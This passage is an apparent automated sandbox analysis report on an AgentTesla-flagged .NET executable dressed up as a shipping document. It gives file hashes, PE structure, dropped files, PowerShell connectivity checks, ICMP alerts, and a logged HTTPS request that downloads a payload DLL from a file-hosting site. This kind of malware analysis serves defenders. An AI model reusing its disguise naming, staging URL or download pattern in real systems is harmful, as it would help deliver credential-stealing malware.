                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsao55a1.fpx.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fphenon1.pyw.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khzjh4ia.0w4.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mccq3qmo.ceq.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ntvz1zil.bqg.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unknown
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\Documents\20210928\PowerShell_transcript.928100.HddUljwH.20210928121728.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1587
                                                              Entropy (8bit):4.711357895836663
                                                              Encrypted:false
                                                              SSDEEP:48:BZ4fv/GoOwvFqDYB1ZehYQUq+MLCaa8pCzCzCzCxZZH:BZC/GNw9qDo1Zv/qH2aa8pSSS6ZZ
                                                              MD5:195708BBB2ABD786F8E864D7DB562BC6
                                                              SHA1:2CEC805819E1EEE983E30EC13D47DCA0609D5232
                                                              SHA-256:400C70BCA53DD8EABD37AE8AD9E68CFDA82FA50BBAC29C9384AF1C8AF65A7B2C
                                                              SHA-512:79F03024FD14CE25395B3F5A358B002A4C4526B228CC4CE79B0D543E78BBA93D67054FEBB3DBB32E33146A233E0C8792861D6DA28A5C7F03C39B7C8DD73CAF36
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210928121729..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.bing.com..Process ID: 1688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210928121729..**********************..PS>Test-Connection www.bing.com....Source Destination IPV4Address IPV6Address Bytes Time(ms)..------ ----------- ----------- ----------- ----- --------..DESKTOP-71... www.bing.com 131.
                                                              C:\Users\user\Documents\20210928\PowerShell_transcript.928100.X4LCDutf.20210928121740.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1593
                                                              Entropy (8bit):4.71742658210396
                                                              Encrypted:false
                                                              SSDEEP:48:BZ4yev/GoOw+pzqDYB1Zeyh+2Uq+MLCaa8p6Y6Y6t63ZZM:BZg/GNw+dqDo1Z1+VqH2aa8p6Y6Y6t6A
                                                              MD5:045298FE090F18E8B9158E99161EE33A
                                                              SHA1:C5A7A013ABC96547BF3AD538C4F796FF485AD5F6
                                                              SHA-256:F1E1905D03C6152DE6DA2EB9CE0A61A0444EE3E81AE98320D23D57940D9849A9
                                                              SHA-512:F00C5FED636D01212D46A25CE433F86D1BA69FB6F40B2D4BB18CF33DC021C652686C273DA4925AFD033465F0E779A80D4C6E1FF5A018B4DA42C50DCCCFD9196E
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210928121741..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.twitter.com..Process ID: 6896..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210928121741..**********************..PS>Test-Connection www.twitter.com....Source Destination IPV4Address IPV6Address Bytes Time(ms)..------ ----------- ----------- ----------- ----- --------..DESKTOP-71... www.twitter.co
                                                              C:\Users\user\Documents\20210928\PowerShell_transcript.928100.hGl4G0Jf.20210928121730.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1595
                                                              Entropy (8bit):4.741496017971404
                                                              Encrypted:false
                                                              SSDEEP:48:BZ4zv/GoOwhHqDYB1Ze2+Uq+MLCaa8pG7GhKZZHE:BZG/GNwNqDo1Z3dqH2aa8pG7GhKZhE
                                                              MD5:CA1AB6CBCC0E48A35728246390871CBE
                                                              SHA1:598F03F5B4AEB3F014634544BA1EEEB4C1E0CB72
                                                              SHA-256:89B7051BEFDB3BDA4D72BA0EF13E5C266EA0C3CF76BEDE74BAA43136197CD3A1
                                                              SHA-512:2901874B5F7A579B91E268C3440BB6950EAD381BE7E7C3192DFCAD60742D6AD74A7DA6FA107422AF2DD84D810E98889C68DC83F35DB1636FB4E0652C88C6682E
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210928121732..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.facebook.com..Process ID: 5512..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210928121732..**********************..PS>Test-Connection www.facebook.com....Source Destination IPV4Address IPV6Address Bytes Time(ms)..------ ----------- ----------- ----------- ----- --------..DESKTOP-71... www.facebook
                                                              C:\Users\user\Documents\20210928\PowerShell_transcript.928100.kBlHq1ED.20210928121728.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unknown
                                                              Category:dropped
                                                              Size (bytes):1591
                                                              Entropy (8bit):4.748906617872173
                                                              Encrypted:false
                                                              SSDEEP:48:BZ4pv/GoOw6BqDYB1ZeEHUq+MLCaa8pZaajZZd:BZU/GNweqDo1ZV0qH2aa8pZaajZH
                                                              MD5:9F4B4256CA5DBF72B2F62982F431D0C9
                                                              SHA1:9C276DB0BB8740878C381E53158DCE8B58C4062A
                                                              SHA-256:982DCDDF4A31CD7D37375E655D9763BB6C65FC9AD812F1E19A324EAD1F3C7A67
                                                              SHA-512:DF8452941F98F180ED6ECF1A6921F0A8EF57714F315013D23863966BD4A7F1BB7CD03B76F1DC7B462D3F68A99F935C5AB4727FAD9C07C744625729041A2333B7
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210928121730..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com..Process ID: 5176..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210928121730..**********************..PS>Test-Connection www.google.com....Source Destination IPV4Address IPV6Address Bytes Time(ms)..------ ----------- ----------- ----------- ----- --------..DESKTOP-71... www.google.com

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):2.6309833530297553
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File size:393216
                                                              MD5:93445df2c96362810e0395c5c867700e
                                                              SHA1:645f936406b04fbfb737bbffb5678d5255c6ec34
                                                              SHA256:ecb4fe719a7fc1365d70ec9db8b3c74cb4bf8968324c25d3817fcc5628fae6fa
                                                              SHA512:bfcfc7c220963f8269537b737d71251dfe3a9f6a800e7d65e3a1fd449a4f3f9e12c7f20207543009f8655a4fdfa672a11173de27e682478da4f15a0875f3bae8
                                                              SSDEEP:3072:qx4Jmb4+WHRWm+3TkQ/b62tN+mbjOKC1g2L4o:qvb4+WZQJ0
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....@...............0..B...........a... ........@.. .......................`............@................................

                                                              File Icon

                                                              Icon Hash:f150098119810105

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x40611e
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0xA040EBAA [Sun Mar 14 03:53:14 2055 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              Name                                  Virtual Address  Virtual Size  Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT          0x60d0           0x4b          .text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8000           0x5b8dc       .rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x64000          0xc           .reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                              Sections

                                                              Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
                                                              .text   0x2000           0x4124        0x4200    False     0.553799715909   data       5.99300542363    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .rsrc   0x8000           0x5b8dc       0x5ba00   False     0.108509016883   data       2.36998119081    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc  0x64000          0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              Name           RVA      Size     Type  Language  Country
                                                              RT_ICON        0x8250   0x42028  dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0
                                                              RT_ICON        0x4a278  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                              RT_ICON        0x5aaa0  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 7360, next used block 4294967167
                                                              RT_ICON        0x5ecc8  0x25a8   data
                                                              RT_ICON        0x61270  0x10a8   data
                                                              RT_ICON        0x62318  0x988    data
                                                              RT_ICON        0x62ca0  0x468    GLS_BINARY_LSB_FIRST
                                                              RT_GROUP_ICON  0x63108  0x68     data
                                                              RT_VERSION     0x63170  0x580    XENIX 8086 relocatable or 80286 small model
                                                              RT_MANIFEST    0x636f0  0x1ea    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                              Imports

                                                              DLL          Import
                                                              mscoree.dll  _CorExeMain

                                                              Version Infos

                                                              Description       Data
                                                              Translation       0x0000 0x04b0
                                                              LegalCopyright
                                                              Assembly Version  6.0.202.0
                                                              InternalName      Azuka.exe
                                                              FileVersion       6.0.202.0
                                                              CompanyName       Aone Software
                                                              LegalTrademarks
                                                              Comments          Ultra PSP Movie Converter Setup
                                                              ProductName       Ultra PSP Movie Converter
                                                              ProductVersion    6.0.202.0
                                                              FileDescription   Ultra PSP Movie Converter Setup
                                                              OriginalFilename  Azuka.exe

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              Timestamp                 Protocol  SID  Message            Source Port  Dest Port  Source IP        Dest IP
                                                              09/28/21-12:17:32.572097  ICMP      382  ICMP PING Windows                          192.168.2.5      131.253.33.200
                                                              09/28/21-12:17:32.572097  ICMP      384  ICMP PING                                  192.168.2.5      131.253.33.200
                                                              09/28/21-12:17:32.597519  ICMP      408  ICMP Echo Reply                            131.253.33.200   192.168.2.5
                                                              09/28/21-12:17:33.202571  ICMP      382  ICMP PING Windows                          192.168.2.5      142.250.185.196
                                                              09/28/21-12:17:33.202571  ICMP      384  ICMP PING                                  192.168.2.5      142.250.185.196
                                                              09/28/21-12:17:33.221224  ICMP      408  ICMP Echo Reply                            142.250.185.196  192.168.2.5
                                                              09/28/21-12:17:33.956607  ICMP      382  ICMP PING Windows                          192.168.2.5      157.240.234.35
                                                              09/28/21-12:17:33.956607  ICMP      384  ICMP PING                                  192.168.2.5      157.240.234.35
                                                              09/28/21-12:17:33.995412  ICMP      408  ICMP Echo Reply                            157.240.234.35   192.168.2.5
                                                              09/28/21-12:17:35.340300  ICMP      382  ICMP PING Windows                          192.168.2.5      131.253.33.200
                                                              09/28/21-12:17:35.340300  ICMP      384  ICMP PING                                  192.168.2.5      131.253.33.200
                                                              09/28/21-12:17:35.365452  ICMP      408  ICMP Echo Reply                            131.253.33.200   192.168.2.5
                                                              09/28/21-12:17:35.526105  ICMP      382  ICMP PING Windows                          192.168.2.5      142.250.185.196
                                                              09/28/21-12:17:35.526105  ICMP      384  ICMP PING                                  192.168.2.5      142.250.185.196
                                                              09/28/21-12:17:35.544749  ICMP      408  ICMP Echo Reply                            142.250.185.196  192.168.2.5
                                                              09/28/21-12:17:36.046583  ICMP      382  ICMP PING Windows                          192.168.2.5      157.240.17.35
                                                              09/28/21-12:17:36.046583  ICMP      384  ICMP PING                                  192.168.2.5      157.240.17.35
                                                              09/28/21-12:17:36.059181  ICMP      408  ICMP Echo Reply                            157.240.17.35    192.168.2.5
                                                              09/28/21-12:17:36.534283  ICMP      382  ICMP PING Windows                          192.168.2.5      131.253.33.200
                                                              09/28/21-12:17:36.534283  ICMP      384  ICMP PING                                  192.168.2.5      131.253.33.200
                                                              09/28/21-12:17:36.559330  ICMP      408  ICMP Echo Reply                            131.253.33.200   192.168.2.5
                                                              09/28/21-12:17:36.700038  ICMP      382  ICMP PING Windows                          192.168.2.5      142.250.185.196
                                                              09/28/21-12:17:36.700038  ICMP      384  ICMP PING                                  192.168.2.5      142.250.185.196
                                                              09/28/21-12:17:36.718686  ICMP      408  ICMP Echo Reply                            142.250.185.196  192.168.2.5
                                                              09/28/21-12:17:37.249338  ICMP      382  ICMP PING Windows                          192.168.2.5      157.240.234.35
                                                              09/28/21-12:17:37.249338  ICMP      384  ICMP PING                                  192.168.2.5      157.240.234.35
                                                              09/28/21-12:17:37.288477  ICMP      408  ICMP Echo Reply                            157.240.234.35   192.168.2.5
                                                              09/28/21-12:17:37.705317  ICMP      382  ICMP PING Windows                          192.168.2.5      131.253.33.200
                                                              09/28/21-12:17:37.705317  ICMP      384  ICMP PING                                  192.168.2.5      131.253.33.200
                                                              09/28/21-12:17:37.730639  ICMP      408  ICMP Echo Reply                            131.253.33.200   192.168.2.5
                                                              09/28/21-12:17:37.888486  ICMP      382  ICMP PING Windows                          192.168.2.5      142.250.185.196
                                                              09/28/21-12:17:37.888486  ICMP      384  ICMP PING                                  192.168.2.5      142.250.185.196
                                                              09/28/21-12:17:37.907409  ICMP      408  ICMP Echo Reply                            142.250.185.196  192.168.2.5
                                                              09/28/21-12:17:38.442898  ICMP      382  ICMP PING Windows                          192.168.2.5      157.240.17.35
                                                              09/28/21-12:17:38.442898  ICMP      384  ICMP PING                                  192.168.2.5      157.240.17.35
                                                              09/28/21-12:17:38.454638  ICMP      408  ICMP Echo Reply                            157.240.17.35    192.168.2.5
                                                              09/28/21-12:17:43.161306  ICMP      382  ICMP PING Windows                          192.168.2.5      104.244.42.129
                                                              09/28/21-12:17:43.161306  ICMP      384  ICMP PING                                  192.168.2.5      104.244.42.129
                                                              09/28/21-12:17:43.178041  ICMP      408  ICMP Echo Reply                            104.244.42.129   192.168.2.5
                                                              09/28/21-12:17:45.763853  ICMP      382  ICMP PING Windows                          192.168.2.5      104.244.42.1
                                                              09/28/21-12:17:45.763853  ICMP      384  ICMP PING                                  192.168.2.5      104.244.42.1
                                                              09/28/21-12:17:45.780587  ICMP      408  ICMP Echo Reply                            104.244.42.1     192.168.2.5
                                                              09/28/21-12:17:46.967647ICMP382ICMP PING Windows192.168.2.5104.244.42.129
                                                              09/28/21-12:17:46.967647ICMP384ICMP PING192.168.2.5104.244.42.129
                                                              09/28/21-12:17:46.984341ICMP408ICMP Echo Reply104.244.42.129192.168.2.5
                                                              09/28/21-12:17:48.176739ICMP382ICMP PING Windows192.168.2.5104.244.42.193
                                                              09/28/21-12:17:48.176739ICMP384ICMP PING192.168.2.5104.244.42.193
                                                              09/28/21-12:17:48.195605ICMP408ICMP Echo Reply104.244.42.193192.168.2.5

                                                              Network Port Distribution

                                                              TCP Packets

                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                              UDP Packets

                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Sep 28, 2021 12:18:20.120877981 CEST53610648.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:39.580028057 CEST6189153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:39.599740028 CEST53618918.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:45.480781078 CEST6158553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:45.500493050 CEST53615858.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:48.652843952 CEST6516353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:48.687308073 CEST53651638.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:56.506490946 CEST5896953192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:56.533853054 CEST53589698.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:04.545020103 CEST5397753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:04.562258959 CEST53539778.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:06.858477116 CEST5714753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:06.878015995 CEST53571478.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:20.033674002 CEST5238153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:20.060888052 CEST53523818.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:30.084446907 CEST4923153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:30.113796949 CEST53492318.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:39.286632061 CEST5321753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:39.304291010 CEST53532178.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:20:01.754996061 CEST5255453192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:20:01.772497892 CEST53525548.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:20:03.771164894 CEST4960353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:20:03.789901018 CEST53496038.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:20:38.046719074 CEST6447653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:20:38.065428019 CEST53644768.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:21:11.172101974 CEST4997553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:21:11.194654942 CEST53499758.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:21:26.373656034 CEST5770153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:21:26.399378061 CEST53577018.8.8.8192.168.2.5

                                                              DNS Queries

                                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

                                                              DNS Answers

                                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class

                                                              HTTP Request Dependency Graph

                                                              • store2.gofile.io

                                                              HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49746 | 31.14.69.10 | 443 | C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-28 10:17:54 UTC | 0 | OUT | GET /download/956f4086-c03d-4dbb-9647-f6db09f6a8b5/Iyybawggybiqbtxofebfdynt.dll HTTP/1.1
Host: store2.gofile.io
Connection: Keep-Alive
2021-09-28 10:17:55 UTC | 0 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Disposition: attachment; filename="Iyybawggybiqbtxofebfdynt.dll"
Content-Length: 244752
Content-Type: application/octet-stream
Date: Tue, 28 Sep 2021 10:17:55 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Powered-By: Express
X-Xss-Protection: 1; mode=block
Connection: close


                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              System Behavior

                                                              General

                                                              Start time:12:17:19
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe'
                                                              Imagebase:0xbb0000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.503807801.0000000002FF2000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.503807801.0000000002FF2000.00000004.00000001.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com
                                                              Imagebase:0x1f0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com
